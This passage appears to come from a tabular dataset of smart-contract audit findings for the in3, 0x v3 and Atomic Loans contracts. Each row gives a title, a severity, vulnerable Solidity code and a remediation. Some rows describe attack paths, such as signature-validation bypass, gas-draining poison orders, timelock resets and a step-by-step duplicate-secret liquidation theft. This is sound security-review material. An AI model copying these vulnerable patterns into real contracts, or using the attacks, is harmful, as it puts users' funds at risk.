`owner==signer` otherwise `updateNode` is bypassing the strict requirements enforced with `registerNodeFor` where e.g. the `url` needs to be signed by the signer in order to register it.\\nThe emitted event should always emit `node.signer` instead of `msg.sender` which can be wrong.\\nThe method should emit its own distinct event `LogNodeUpdated` for audit purposes and to be able to distinguish new node registrations from node structure updates. 
This might also require software changes to client/node implementations to listen for node updates.",,"```\\nif (newURl != keccak256(bytes(node.url))) {\\n\\n // deleting the old entry\\n delete urlIndex[keccak256(bytes(node.url))];\\n\\n // make sure the new url is not already in use\\n require(!urlIndex[newURl].used, ""url is already in use"");\\n\\n UrlInformation memory ui;\\n ui.used = true;\\n ui.signer = msg.sender;\\n urlIndex[newURl] = ui;\\n node.url = \\_url;\\n}\\n```\\n" +NodeRegistry - In3Node memory n is never used,low,"NodeRegistry `In3Node memory n` is never used inside the modifier `onlyActiveState`.\\n```\\nmodifier onlyActiveState(address \\_signer) {\\n\\n SignerInformation memory si = signerIndex[\\_signer];\\n require(si.stage == Stages.Active, ""address is not an in3-signer"");\\n\\n In3Node memory n = nodes[si.index];\\n assert(nodes[si.index].signer == \\_signer);\\n \\_;\\n}\\n```\\n",Use `n` in the assertion to access the node signer `assert(n.signer == _signer);` or directly access it from storage and avoid copying the struct.,,"```\\nmodifier onlyActiveState(address \\_signer) {\\n\\n SignerInformation memory si = signerIndex[\\_signer];\\n require(si.stage == Stages.Active, ""address is not an in3-signer"");\\n\\n In3Node memory n = nodes[si.index];\\n assert(nodes[si.index].signer == \\_signer);\\n \\_;\\n}\\n```\\n" +NodeRegistry - removeNode unnecessarily casts the nodeIndex to uint64 potentially truncating its value,low,"`removeNode` removes a node from the Nodes array. This is done by copying the last node of the array to the `_nodeIndex` of the node that is to be removed. Finally the node array size is decreased.\\nA Node's index is also referenced in the `SignerInformation` struct. 
This index needs to be adjusted when removing a node from the array as the last node is copied to the index of the node that is to be removed.\\nWhen adjusting the Node's index in the `SignerInformation` struct `removeNode` casts the index to `uint64`. This is both unnecessary as the struct defines the index as `uint` and theoretically dangerous if a node at an index greater than `uint64_max` is removed. The resulting `SignerInformation` index will be truncated to `uint64` leading to an inconsistency in the contract.\\n```\\nstruct SignerInformation {\\n uint64 lockedTime; /// timestamp until the deposit of an in3-node can not be withdrawn after the node was removed\\n address owner; /// the owner of the node\\n\\n Stages stage; /// state of the address\\n\\n uint depositAmount; /// amount of deposit to be locked, used only after a node had been removed\\n\\n uint index; /// current index-position of the node in the node-array\\n}\\n```\\n\\n```\\n// move the last entry to the removed one.\\nIn3Node memory m = nodes[length - 1];\\nnodes[\\_nodeIndex] = m;\\n\\nSignerInformation storage si = signerIndex[m.signer];\\nsi.index = uint64(\\_nodeIndex);\\nnodes.length--;\\n```\\n",Resolution\\nFixed as per recommendation https://git.slock.it/in3/in3-contracts/commit/6c35dd422e27eec1b1d2f70e328268014cadb515.\\nDo not cast and therefore truncate the index.,,"```\\nstruct SignerInformation {\\n uint64 lockedTime; /// timestamp until the deposit of an in3-node can not be withdrawn after the node was removed\\n address owner; /// the owner of the node\\n\\n Stages stage; /// state of the address\\n\\n uint depositAmount; /// amount of deposit to be locked, used only after a node had been removed\\n\\n uint index; /// current index-position of the node in the node-array\\n}\\n```\\n" +BlockhashRegistry- assembly code can be optimized,low,"The following code can be optimized by removing `mload` and mstore:\\n```\\nrequire(first > 0xf7, ""invalid offset"");\\nuint8 offset = 
first - 0xf7 + 2;\\n\\n/// we are using assembly because it's the most efficent way to access the parent blockhash within the rlp-encoded blockheader\\n// solium-disable-next-line security/no-inline-assembly\\nassembly { // solhint-disable-line no-inline-assembly\\n // mstore to get the memory pointer of the blockheader to 0x20\\n mstore(0x20, \\_blockheader)\\n\\n // we load the pointer we just stored\\n // then we add 0x20 (32 bytes) to get to the start of the blockheader\\n // then we add the offset we calculated\\n // and load it to the parentHash variable\\n parentHash :=mload(\\n add(\\n add(\\n mload(0x20), 0x20\\n ), offset)\\n )\\n}\\n```\\n","```\\nassembly { // solhint-disable-line no-inline-assembly\\n // mstore to get the memory pointer of the blockheader to 0x20\\n //mstore(0x20, \\_blockheader) //@audit should assign 0x20ptr to variable first and use it.\\n\\n // we load the pointer we just stored\\n // then we add 0x20 (32 bytes) to get to the start of the blockheader\\n // then we add the offset we calculated\\n // and load it to the parentHash variable\\n parentHash :=mload(\\n add(\\n add(\\n \\_blockheader, 0x20\\n ), offset)\\n )\\n }\\n```\\n",,"```\\nrequire(first > 0xf7, ""invalid offset"");\\nuint8 offset = first - 0xf7 + 2;\\n\\n/// we are using assembly because it's the most efficent way to access the parent blockhash within the rlp-encoded blockheader\\n// solium-disable-next-line security/no-inline-assembly\\nassembly { // solhint-disable-line no-inline-assembly\\n // mstore to get the memory pointer of the blockheader to 0x20\\n mstore(0x20, \\_blockheader)\\n\\n // we load the pointer we just stored\\n // then we add 0x20 (32 bytes) to get to the start of the blockheader\\n // then we add the offset we calculated\\n // and load it to the parentHash variable\\n parentHash :=mload(\\n add(\\n add(\\n mload(0x20), 0x20\\n ), offset)\\n )\\n}\\n```\\n" +BlockhashRegistry - Existing blockhashes can be overwritten,low,"Last 256 blocks, that 
are available in the EVM environment, are stored in `BlockhashRegistry` by calling `snapshot()` or `saveBlockNumber(uint _blockNumber)` functions. Older blocks are recreated by calling `recreateBlockheaders`.\\nThe methods will overwrite existing blockhashes.\\n```\\nfunction saveBlockNumber(uint \\_blockNumber) public {\\n\\n bytes32 bHash = blockhash(\\_blockNumber);\\n\\n require(bHash != 0x0, ""block not available"");\\n\\n blockhashMapping[\\_blockNumber] = bHash;\\n emit LogBlockhashAdded(\\_blockNumber, bHash);\\n}\\n```\\n\\n```\\nblockhashMapping[bnr] = calculatedHash;\\n```\\n","Resolution\\nAddressed with 80bb6ecf and 17d450cf by checking if blockhash exists and changing the `assert` to `require`.\\nIf a block is already saved in the smart contract, it can be checked and a SSTORE can be prevented to save gas. Require that blocknumber hash is not stored.\\n```\\nrequire(blockhashMapping[\\_blockNumber] == 0x0, ""block already saved"");\\n```\\n",,"```\\nfunction saveBlockNumber(uint \\_blockNumber) public {\\n\\n bytes32 bHash = blockhash(\\_blockNumber);\\n\\n require(bHash != 0x0, ""block not available"");\\n\\n blockhashMapping[\\_blockNumber] = bHash;\\n emit LogBlockhashAdded(\\_blockNumber, bHash);\\n}\\n```\\n" +An account that confirms a transaction via AssetProxyOwner can indefinitely block that transaction,high,"When a transaction reaches the required number of confirmations in `confirmTransaction()`, its confirmation time is recorded:\\n```\\n/// @dev Allows an owner to confirm a transaction.\\n/// @param transactionId Transaction ID.\\nfunction confirmTransaction(uint256 transactionId)\\n public\\n ownerExists(msg.sender)\\n transactionExists(transactionId)\\n notConfirmed(transactionId, msg.sender)\\n notFullyConfirmed(transactionId)\\n{\\n confirmations[transactionId][msg.sender] = true;\\n emit Confirmation(msg.sender, transactionId);\\n if (isConfirmed(transactionId)) {\\n \\_setConfirmationTime(transactionId, block.timestamp);\\n 
}\\n}\\n```\\n\\nBefore the time lock has elapsed and the transaction is executed, any of the owners that originally confirmed the transaction can revoke their confirmation via revokeConfirmation():\\n```\\n/// @dev Allows an owner to revoke a confirmation for a transaction.\\n/// @param transactionId Transaction ID.\\nfunction revokeConfirmation(uint256 transactionId)\\n public\\n ownerExists(msg.sender)\\n confirmed(transactionId, msg.sender)\\n notExecuted(transactionId)\\n{\\n confirmations[transactionId][msg.sender] = false;\\n emit Revocation(msg.sender, transactionId);\\n}\\n```\\n\\nImmediately after, that owner can call `confirmTransaction()` again, which will reset the confirmation time and thus the time lock.\\nThis is especially troubling in the case of a single compromised key, but it's also an issue for disagreement among owners, where any m of the n owners should be able to execute transactions but could be blocked.\\nMitigations\\nOnly an owner can do this, and that owner has to be part of the group that originally confirmed the transaction. This means the malicious owner may have to front run the others to make sure they're in that initial confirmation set.\\nEven once a malicious owner is in position to execute this perpetual delay, they need to call `revokeConfirmation()` and `confirmTransaction()` again each time. Another owner can attempt to front the attacker and execute their own `confirmTransaction()` immediately after the `revokeConfirmation()` to regain control.","There are several ways to address this, but to best preserve the original `MultiSigWallet` semantics, once a transaction has reached the required number of confirmations, it should be impossible to revoke confirmations. 
In the original implementation, this is enforced by immediately executing the transaction when the final confirmation is received.",,"```\\n/// @dev Allows an owner to confirm a transaction.\\n/// @param transactionId Transaction ID.\\nfunction confirmTransaction(uint256 transactionId)\\n public\\n ownerExists(msg.sender)\\n transactionExists(transactionId)\\n notConfirmed(transactionId, msg.sender)\\n notFullyConfirmed(transactionId)\\n{\\n confirmations[transactionId][msg.sender] = true;\\n emit Confirmation(msg.sender, transactionId);\\n if (isConfirmed(transactionId)) {\\n \\_setConfirmationTime(transactionId, block.timestamp);\\n }\\n}\\n```\\n" +Orders with signatures that require regular validation can have their validation bypassed if the order is partially filled,high,"The signature types `Wallet`, `Validator`, and `EIP1271Wallet` require explicit validation to authorize each action performed on a given order. This means that if an order was signed using one of these methods, the `Exchange` must perform a validation step on the signature each time the order is submitted for a partial fill. In contrast, the other canonical signature types (EIP712, `EthSign`, and PreSigned) are only required to be validated by the `Exchange` on the order's first fill; subsequent fills take the order's existing fill amount as implicit validation that the order has a valid, published signature.\\nThis re-validation step for `Wallet`, `Validator`, and `EIP1271Wallet` signatures is intended to facilitate their use with contracts whose validation depends on some state that may change over time. For example, a validating contract may call into a price feed and determine that some order is invalid if its price deviates from some expected range. 
In this case, the repeated validation allows 0x users to make orders with custom fill conditions which are evaluated at run-time.\\nWe found that if the sender provides the contract with an invalid signature after the order in question has already been partially filled, the regular validation check required for `Wallet`, `Validator`, and `EIP1271Wallet` signatures can be bypassed entirely.\\nSignature validation takes place in `MixinExchangeCore._assertFillableOrder`. A signature is only validated if it passes the following criteria:\\n```\\n// Validate either on the first fill or if the signature type requires\\n// regular validation.\\naddress makerAddress = order.makerAddress;\\nif (orderInfo.orderTakerAssetFilledAmount == 0 ||\\n \\_doesSignatureRequireRegularValidation(\\n orderInfo.orderHash,\\n makerAddress,\\n signature\\n )\\n) {\\n```\\n\\nIn effect, signature validation only occurs if:\\n`orderInfo.orderTakerAssetFilledAmount == 0` OR\\n`_doesSignatureRequireRegularValidation(orderHash, makerAddress, signature)`\\nIf an order is partially filled, the first condition will evaluate to false. 
Then, that order's signature will only be validated if `_doesSignatureRequireRegularValidation` evaluates to true:\\n```\\nfunction \\_doesSignatureRequireRegularValidation(\\n bytes32 hash,\\n address signerAddress,\\n bytes memory signature\\n)\\n internal\\n pure\\n returns (bool needsRegularValidation)\\n{\\n // Read the signatureType from the signature\\n SignatureType signatureType = \\_readSignatureType(\\n hash,\\n signerAddress,\\n signature\\n );\\n\\n // Any signature type that makes an external call needs to be revalidated\\n // with every partial fill\\n needsRegularValidation =\\n signatureType == SignatureType.Wallet ||\\n signatureType == SignatureType.Validator ||\\n signatureType == SignatureType.EIP1271Wallet;\\n return needsRegularValidation;\\n}\\n```\\n\\nThe `SignatureType` returned from `_readSignatureType` is directly cast from the final byte of the passed-in signature. Any value that does not cast to `Wallet`, `Validator`, and `EIP1271Wallet` will cause `_doesSignatureRequireRegularValidation` to return false, skipping validation.\\nThe result is that an order whose signature requires regular validation can be forced to skip validation if it has been partially filled, by passing in an invalid signature.","There are a few options for remediation:\\nHave the `Exchange` validate the provided signature every time an order is filled.\\nRecord the first seen signature type or signature hash for each order, and check that subsequent actions are submitted with a matching signature.\\nThe first option requires the fewest changes, and does not require storing additional state. 
While this does mean some additional cost validating subsequent signatures, we feel the increase in flexibility is well worth it, as a maker could choose to create multiple valid signatures for use across different order books.",,"```\\n// Validate either on the first fill or if the signature type requires\\n// regular validation.\\naddress makerAddress = order.makerAddress;\\nif (orderInfo.orderTakerAssetFilledAmount == 0 ||\\n \\_doesSignatureRequireRegularValidation(\\n orderInfo.orderHash,\\n makerAddress,\\n signature\\n )\\n) {\\n```\\n" +Changing the owners or required confirmations in the AssetProxyOwner can unconfirm a previously confirmed transaction,medium,"Once a transaction has been confirmed in the `AssetProxyOwner`, it cannot be executed until a lock period has passed. During that time, any change to the number of required confirmations will cause this transaction to no longer be executable.\\nIf the number of required confirmations was decreased, then one or more owners will have to revoke their confirmation before the transaction can be executed.\\nIf the number of required confirmations was increased, then additional owners will have to confirm the transaction, and when the new required number of confirmations is reached, a new confirmation time will be recorded, and thus the time lock will restart.\\nSimilarly, if an owner that had previously confirmed the transaction is replaced, the number of confirmations will drop for existing transactions, and they will need to be confirmed again.\\nThis is not disastrous, but it's almost certainly unintended behavior and may make it difficult to make changes to the multisig owners and parameters.\\n`executeTransaction()` requires that at the time of execution, the transaction is confirmed:\\n```\\nfunction executeTransaction(uint256 transactionId)\\n public\\n notExecuted(transactionId)\\n fullyConfirmed(transactionId)\\n```\\n\\n`isConfirmed()` checks for exact equality with the number of required 
confirmations. Having too many confirmations is just as bad as too few:\\n```\\n/// @dev Returns the confirmation status of a transaction.\\n/// @param transactionId Transaction ID.\\n/// @return Confirmation status.\\nfunction isConfirmed(uint256 transactionId)\\n public\\n view\\n returns (bool)\\n{\\n uint256 count = 0;\\n for (uint256 i = 0; i < owners.length; i++) {\\n if (confirmations[transactionId][owners[i]]) {\\n count += 1;\\n }\\n if (count == required) {\\n return true;\\n }\\n }\\n}\\n```\\n\\nIf additional confirmations are required to reconfirm a transaction, that resets the time lock:\\n```\\n/// @dev Allows an owner to confirm a transaction.\\n/// @param transactionId Transaction ID.\\nfunction confirmTransaction(uint256 transactionId)\\n public\\n ownerExists(msg.sender)\\n transactionExists(transactionId)\\n notConfirmed(transactionId, msg.sender)\\n notFullyConfirmed(transactionId)\\n{\\n confirmations[transactionId][msg.sender] = true;\\n emit Confirmation(msg.sender, transactionId);\\n if (isConfirmed(transactionId)) {\\n \\_setConfirmationTime(transactionId, block.timestamp);\\n }\\n}\\n```\\n","As in https://github.com/ConsenSys/0x-v3-audit-2019-09/issues/39, the semantics of the original `MultiSigWallet` were that once a transaction is fully confirmed, it's immediately executed. The time lock means this is no longer possible, but it is possible to record that the transaction is confirmed and never allow this to change. In fact, the confirmation time already records this. Once the confirmation time is non-zero, a transaction should always be considered confirmed.",,```\\nfunction executeTransaction(uint256 transactionId)\\n public\\n notExecuted(transactionId)\\n fullyConfirmed(transactionId)\\n```\\n +Reentrancy in executeTransaction() Won't Fix,medium,"In `MixinTransactions`, `executeTransaction()` and `batchExecuteTransactions()` do not have the `nonReentrant` modifier. 
Because of that, it is possible to execute nested transactions or call these functions during other reentrancy attacks on the exchange. The reason behind that decision is to be able to call functions with `nonReentrant` modifier as delegated transactions.\\nNested transactions are partially prevented with a separate check that does not allow transaction execution if the exchange is currently in somebody else's context:\\n```\\n// Prevent `executeTransaction` from being called when context is already set\\naddress currentContextAddress\\_ = currentContextAddress;\\nif (currentContextAddress\\_ != address(0)) {\\n LibRichErrors.rrevert(LibExchangeRichErrors.TransactionInvalidContextError(\\n transactionHash,\\n currentContextAddress\\_\\n ));\\n}\\n```\\n\\nThis check still leaves some possibility of reentrancy. Allowing that behavior is dangerous and may create possible attack vectors in the future.",Add a new modifier to `executeTransaction()` and `batchExecuteTransactions()` which is similar to `nonReentrant` but uses different storage slot.,,"```\\n// Prevent `executeTransaction` from being called when context is already set\\naddress currentContextAddress\\_ = currentContextAddress;\\nif (currentContextAddress\\_ != address(0)) {\\n LibRichErrors.rrevert(LibExchangeRichErrors.TransactionInvalidContextError(\\n transactionHash,\\n currentContextAddress\\_\\n ));\\n}\\n```\\n" +“Poison” order that consumes gas can block market trades Won't Fix,medium,"The market buy/sell functions gather a list of orders together for the same asset and try to fill them in order until a target amount has been traded.\\nThese functions use `MixinWrapperFunctions._fillOrderNoThrow()` to attempt to fill each order but ignore failures. 
This way, if one order is unfillable for some reason, the overall market order can still succeed by filling other orders.\\nOrders can still force `_fillOrderNoThrow()` to revert by using an external contract for signature validation and having that contract consume all available gas.\\nThis makes it possible to advertise a “poison” order for a low price that will block all market orders from succeeding. It's reasonable to assume that off-chain order books will automatically include the best prices when constructing market orders, so this attack would likely be quite effective. Note that such an attack costs the attacker nothing because all they need is an on-chain contract that consumes all available gas (maybe via an assert). This makes it a very appealing attack vector for, e.g., an order book that wants to temporarily disable a competitor.\\nDetails\\n`_fillOrderNoThrow()` forwards all available gas when filling the order:\\n```\\n// ABI encode calldata for `fillOrder`\\nbytes memory fillOrderCalldata = abi.encodeWithSelector(\\n IExchangeCore(address(0)).fillOrder.selector,\\n order,\\n takerAssetFillAmount,\\n signature\\n);\\n\\n(bool didSucceed, bytes memory returnData) = address(this).delegatecall(fillOrderCalldata);\\n```\\n\\nSimilarly, when the `Exchange` attempts to fill an order that requires external signature validation (Wallet, `Validator`, or `EIP1271Wallet` signature types), it forwards all available gas:\\n```\\n(bool didSucceed, bytes memory returnData) = verifyingContractAddress.staticcall(callData);\\n```\\n\\nIf the verifying contract consumes all available gas, it can force the overall transaction to revert.\\nPedantic Note\\nTechnically, it's impossible to consume all remaining gas when called by another contract because the EVM holds back a small amount, but even at the block gas limit, the amount held back would be insufficient to complete the transaction.",Constrain the gas that is forwarded during signature validation. 
This can be constrained either as a part of the signature or as a parameter provided by the taker.,,"```\\n// ABI encode calldata for `fillOrder`\\nbytes memory fillOrderCalldata = abi.encodeWithSelector(\\n IExchangeCore(address(0)).fillOrder.selector,\\n order,\\n takerAssetFillAmount,\\n signature\\n);\\n\\n(bool didSucceed, bytes memory returnData) = address(this).delegatecall(fillOrderCalldata);\\n```\\n" +Front running in matchOrders() Won't Fix,medium,"Calls to `matchOrders()` are made to extract profit from the price difference between two opposite orders: left and right.\\n```\\nfunction matchOrders(\\n LibOrder.Order memory leftOrder,\\n LibOrder.Order memory rightOrder,\\n bytes memory leftSignature,\\n bytes memory rightSignature\\n)\\n```\\n\\nThe caller only pays protocol and transaction fees, so it's almost always profitable to front run every call to `matchOrders()`. That would lead to gas auctions and would make `matchOrders()` difficult to use.",Consider adding a commit-reveal scheme to `matchOrders()` to stop front running altogether.,,"```\\nfunction matchOrders(\\n LibOrder.Order memory leftOrder,\\n LibOrder.Order memory rightOrder,\\n bytes memory leftSignature,\\n bytes memory rightSignature\\n)\\n```\\n" +The Exchange owner should not be able to call executeTransaction or batchExecuteTransaction Won't Fix,medium,"If the owner calls either of these functions, the resulting `delegatecall` can pass `onlyOwner` modifiers even if the transaction signer is not the owner. 
This is because, regardless of the `contextAddress` set through `_executeTransaction`, the `onlyOwner` modifier checks `msg.sender`.\\n`_executeTransaction` sets the context address to the signer address, which is not `msg.sender` in this case:\\n```\\n// Set the current transaction signer\\naddress signerAddress = transaction.signerAddress;\\n\\_setCurrentContextAddressIfRequired(signerAddress, signerAddress);\\n```\\n\\nThe resulting `delegatecall` could target an admin function like this one:\\n```\\n/// @dev Registers an asset proxy to its asset proxy id.\\n/// Once an asset proxy is registered, it cannot be unregistered.\\n/// @param assetProxy Address of new asset proxy to register.\\nfunction registerAssetProxy(address assetProxy)\\n external\\n onlyOwner\\n{\\n // Ensure that no asset proxy exists with current id.\\n bytes4 assetProxyId = IAssetProxy(assetProxy).getProxyId();\\n address currentAssetProxy = \\_assetProxies[assetProxyId];\\n if (currentAssetProxy != address(0)) {\\n LibRichErrors.rrevert(LibExchangeRichErrors.AssetProxyExistsError(\\n assetProxyId,\\n currentAssetProxy\\n ));\\n }\\n \\n // Add asset proxy and log registration.\\n \\_assetProxies[assetProxyId] = assetProxy;\\n emit AssetProxyRegistered(\\n assetProxyId,\\n assetProxy\\n );\\n}\\n```\\n\\nThe `onlyOwner` modifier does not check the context address, but checks msg.sender:\\n```\\nfunction \\_assertSenderIsOwner()\\n internal\\n view\\n{\\n if (msg.sender != owner) {\\n LibRichErrors.rrevert(LibOwnableRichErrors.OnlyOwnerError(\\n msg.sender,\\n owner\\n ));\\n }\\n}\\n```\\n",Add a check to `_executeTransaction` that prevents the owner from calling this function.,,"```\\n// Set the current transaction signer\\naddress signerAddress = transaction.signerAddress;\\n\\_setCurrentContextAddressIfRequired(signerAddress, signerAddress);\\n```\\n" +"By manipulating the gas limit, relayers can affect the outcome of ZeroExTransactions Won't Fix",low,"ZeroExTransactions are meta 
transactions supported by the `Exchange`. They do not require that they are executed with a specific amount of gas, so the transaction relayer can choose how much gas to provide. By choosing a low gas limit, a relayer can affect the outcome of the transaction.\\nA `ZeroExTransaction` specifies a signer, an expiration, and call data for the transaction:\\n```\\nstruct ZeroExTransaction {\\n uint256 salt; // Arbitrary number to ensure uniqueness of transaction hash.\\n uint256 expirationTimeSeconds; // Timestamp in seconds at which transaction expires.\\n uint256 gasPrice; // gasPrice that transaction is required to be executed with.\\n address signerAddress; // Address of transaction signer.\\n bytes data; // AbiV2 encoded calldata.\\n}\\n```\\n\\nIn `MixinTransactions._executeTransaction()`, all available gas is forwarded in the delegate call, and the transaction is marked as executed:\\n```\\ntransactionsExecuted[transactionHash] = true;\\n(bool didSucceed, bytes memory returnData) = address(this).delegatecall(transaction.data);\\n```\\n\\nA likely attack vector for this is front running a `ZeroExTransaction` that ultimately invokes `_fillNoThrow()`. In this scenario, an attacker sees the call to `executeTransaction()` and makes their own call with a lower gas limit, causing the order being filled to run out of gas but allowing the transaction as a whole to succeed.\\nIf such an attack is successful, the `ZeroExTransaction` cannot be replayed, so the signer must produce a new signature and try again, ad infinitum.","Resolution\\nFrom the development team:\\nWhile this is an annoyance when used in combination with `marketBuyOrdersNoThrow` and `marketSellOrdersNoThrow`, it does not seem worth it to add a `gasLimit` to 0x transactions for this reason alone. 
Instead, this quirk should be documented along with a recommendation to use the `fillOrKill` variants of each market fill function when used in combination with 0x transactions.\\nAdd a `gasLimit` field to `ZeroExTransaction` and forward exactly that much gas via `delegatecall`. (Note that you must explicitly check that sufficient gas is available because the EVM allows you to supply a gas parameter that exceeds the actual remaining gas.)",,```\\nstruct ZeroExTransaction {\\n uint256 salt; // Arbitrary number to ensure uniqueness of transaction hash.\\n uint256 expirationTimeSeconds; // Timestamp in seconds at which transaction expires.\\n uint256 gasPrice; // gasPrice that transaction is required to be executed with.\\n address signerAddress; // Address of transaction signer.\\n bytes data; // AbiV2 encoded calldata.\\n}\\n```\\n +Modifier ordering plays a significant role in modifier efficacy,low,"The `nonReentrant` and `refundFinalBalance` modifiers always appear together across the 0x monorepo. When used, they invariably appear with `nonReentrant` listed first, followed by `refundFinalBalance`. This specific order appears inconsequential at first glance but is actually important. The order of execution is as follows:\\nThe `nonReentrant` modifier runs (_lockMutexOrThrowIfAlreadyLocked).\\nIf `refundFinalBalance` had a prefix, it would run now.\\nThe function itself runs.\\nThe `refundFinalBalance` modifier runs (_refundNonZeroBalanceIfEnabled).\\nThe `nonReentrant` modifier runs (_unlockMutex).\\nThe fact that the `refundFinalBalance` modifier runs before the mutex is unlocked is of particular importance because it potentially invokes an external call, which may reenter. 
If the order of the two modifiers were flipped, the mutex would unlock before the external call, defeating the purpose of the reentrancy guard.\\n```\\nnonReentrant\\nrefundFinalBalance\\n```\\n","Resolution\\nThis is fixed in 0xProject/0x-monorepo#2228 by introducing a new modifier that combines the two: `refundFinalBalance`.\\nAlthough the order of the modifiers is correct as-is, this pattern introduces cognitive overhead when making or reviewing changes to the 0x codebase. Because the two modifiers always appear together, it may make sense to combine the two into a single modifier where the order of operations is explicit.",,```\\nnonReentrant\\nrefundFinalBalance\\n```\\n +Several overflows in LibBytes,low,"Several functions in `LibBytes` have integer overflows.\\n`LibBytes.readBytesWithLength` returns a pointer to a `bytes` array within an existing `bytes` array at some given `index`. The length of the nested array is added to the given `index` and checked against the parent array to ensure the data in the nested array is within the bounds of the parent. However, because the addition can overflow, the bounds check can be bypassed to return an array that points to data out of bounds of the parent array.\\n```\\nif (b.length < index + nestedBytesLength) {\\n LibRichErrors.rrevert(LibBytesRichErrors.InvalidByteOperationError(\\n LibBytesRichErrors\\n .InvalidByteOperationErrorCodes.LengthGreaterThanOrEqualsNestedBytesLengthRequired,\\n b.length,\\n index + nestedBytesLength\\n ));\\n}\\n```\\n\\nThe following functions have similar issues:\\n`readAddress`\\n`writeAddress`\\n`readBytes32`\\n`writeBytes32`\\n`readBytes4`","An overflow check should be added to the function. Alternatively, because `readBytesWithLength` does not appear to be used anywhere in the 0x project, the function should be removed from `LibBytes`. 
Additionally, the following functions in `LibBytes` are also not used and should be considered for removal:\\n`popLast20Bytes`\\n`writeAddress`\\n`writeBytes32`\\n`writeUint256`\\n`writeBytesWithLength`\\n`deepCopyBytes`",,"```\\nif (b.length < index + nestedBytesLength) {\\n LibRichErrors.rrevert(LibBytesRichErrors.InvalidByteOperationError(\\n LibBytesRichErrors\\n .InvalidByteOperationErrorCodes.LengthGreaterThanOrEqualsNestedBytesLengthRequired,\\n b.length,\\n index + nestedBytesLength\\n ));\\n}\\n```\\n" +NSignatureTypes enum value bypasses Solidity safety checks Won't Fix,low,"The `ISignatureValidator` contract defines an enum `SignatureType` to represent the different types of signatures recognized within the exchange. The final enum value, `NSignatureTypes`, is not a valid signature type. Instead, it is used by `MixinSignatureValidator` to check that the value read from the signature is a valid enum value. However, Solidity now includes its own check for enum casting, and casting a value over the maximum enum size to an enum is no longer possible.\\nBecause of the added `NSignatureTypes` value, Solidity's check now recognizes `0x08` as a valid `SignatureType` value.\\nThe check is made here:\\n```\\n// Ensure signature is supported\\nif (uint8(signatureType) >= uint8(SignatureType.NSignatureTypes)) {\\n LibRichErrors.rrevert(LibExchangeRichErrors.SignatureError(\\n LibExchangeRichErrors.SignatureErrorCodes.UNSUPPORTED,\\n hash,\\n signerAddress,\\n signature\\n ));\\n}\\n```\\n","The check should be removed, as should the `SignatureTypes.NSignatureTypes` value.",,"```\\n// Ensure signature is supported\\nif (uint8(signatureType) >= uint8(SignatureType.NSignatureTypes)) {\\n LibRichErrors.rrevert(LibExchangeRichErrors.SignatureError(\\n LibExchangeRichErrors.SignatureErrorCodes.UNSUPPORTED,\\n hash,\\n signerAddress,\\n signature\\n ));\\n}\\n```\\n" +Intentional secret reuse can block borrower and lender from accepting liquidation payment,high,"For Dave 
(the liquidator) to claim the collateral he's purchasing, he must reveal secret D. Once that secret is revealed, Alice and Bob (the borrower and lender) can claim the payment.\\nSecrets must be provided via the `Sales.provideSecret()` function:\\n```\\n function provideSecret(bytes32 sale, bytes32 secret\\_) external {\\n require(sales[sale].set);\\n if (sha256(abi.encodePacked(secret\\_)) == secretHashes[sale].secretHashA) { secretHashes[sale].secretA = secret\\_; }\\n else if (sha256(abi.encodePacked(secret\\_)) == secretHashes[sale].secretHashB) { secretHashes[sale].secretB = secret\\_; }\\n else if (sha256(abi.encodePacked(secret\\_)) == secretHashes[sale].secretHashC) { secretHashes[sale].secretC = secret\\_; }\\n else if (sha256(abi.encodePacked(secret\\_)) == secretHashes[sale].secretHashD) { secretHashes[sale].secretD = secret\\_; }\\n else { revert(); }\\n }\\n```\\n\\nNote that if Dave chooses the same secret hash as either Alice, Bob, or Charlie (arbiter), there is no way to set `secretHashes[sale].secretD` because one of the earlier conditionals will execute.\\nFor Alice and Bob to later receive payment, they must be able to provide Dave's secret:\\n```\\n function accept(bytes32 sale) external {\\n require(!accepted(sale));\\n require(!off(sale));\\n require(hasSecrets(sale));\\n require(sha256(abi.encodePacked(secretHashes[sale].secretD)) == secretHashes[sale].secretHashD);\\n```\\n\\nDave can exploit this to obtain the collateral for free:\\nDave looks at Alice's secret hashes to see which will be used in the sale.\\nDave begins the liquidation process, using the same secret hash.\\nAlice and Bob reveal their secrets A and B through the process of moving the collateral.\\nDave now knows the preimage for the secret hash he provided. 
It was revealed by Alice already.\\nDave uses that secret to obtain the collateral.\\nAlice and Bob now want to receive payment, but they're unable to provide Dave's secret to the `Sales` smart contract due to the order of conditionals in `provideSecret()`.\\nAfter an expiration, Dave can claim a refund.\\nMitigating factors\\nAlice and Bob could notice that Dave chose a duplicate secret hash and refuse to proceed with the sale. This is not something they are likely to do.",Either change the way `provideSecret()` works to allow for duplicate secret hashes or reject duplicate hashes in `create()`.,,"```\\n function provideSecret(bytes32 sale, bytes32 secret\\_) external {\\n require(sales[sale].set);\\n if (sha256(abi.encodePacked(secret\\_)) == secretHashes[sale].secretHashA) { secretHashes[sale].secretA = secret\\_; }\\n else if (sha256(abi.encodePacked(secret\\_)) == secretHashes[sale].secretHashB) { secretHashes[sale].secretB = secret\\_; }\\n else if (sha256(abi.encodePacked(secret\\_)) == secretHashes[sale].secretHashC) { secretHashes[sale].secretC = secret\\_; }\\n else if (sha256(abi.encodePacked(secret\\_)) == secretHashes[sale].secretHashD) { secretHashes[sale].secretD = secret\\_; }\\n else { revert(); }\\n }\\n```\\n" +There is no way to convert between custom and non-custom funds Won't Fix,medium,"Each fund is created using either `Funds.create()` or `Funds.createCustom()`. 
Both enforce a limitation that there can only be one fund per account:\\n```\\nfunction create(\\n uint256 maxLoanDur\\_,\\n uint256 maxFundDur\\_,\\n address arbiter\\_,\\n bool compoundEnabled\\_,\\n uint256 amount\\_\\n) external returns (bytes32 fund) {\\n require(fundOwner[msg.sender].lender != msg.sender || msg.sender == deployer); // Only allow one loan fund per address\\n```\\n\\n```\\nfunction createCustom(\\n uint256 minLoanAmt\\_,\\n uint256 maxLoanAmt\\_,\\n uint256 minLoanDur\\_,\\n uint256 maxLoanDur\\_,\\n uint256 maxFundDur\\_,\\n uint256 liquidationRatio\\_,\\n uint256 interest\\_,\\n uint256 penalty\\_,\\n uint256 fee\\_,\\n address arbiter\\_,\\n bool compoundEnabled\\_,\\n uint256 amount\\_\\n) external returns (bytes32 fund) {\\n require(fundOwner[msg.sender].lender != msg.sender || msg.sender == deployer); // Only allow one loan fund per address\\n```\\n\\nThese functions are the only place where `bools[fund].custom` is set, and there's no way to delete a fund once it exists. This means there's no way for a given account to switch between a custom and non-custom fund.\\nThis could be a problem if, for example, the default parameters change in a way that a user finds unappealing. They may want to switch to using a custom fund but find 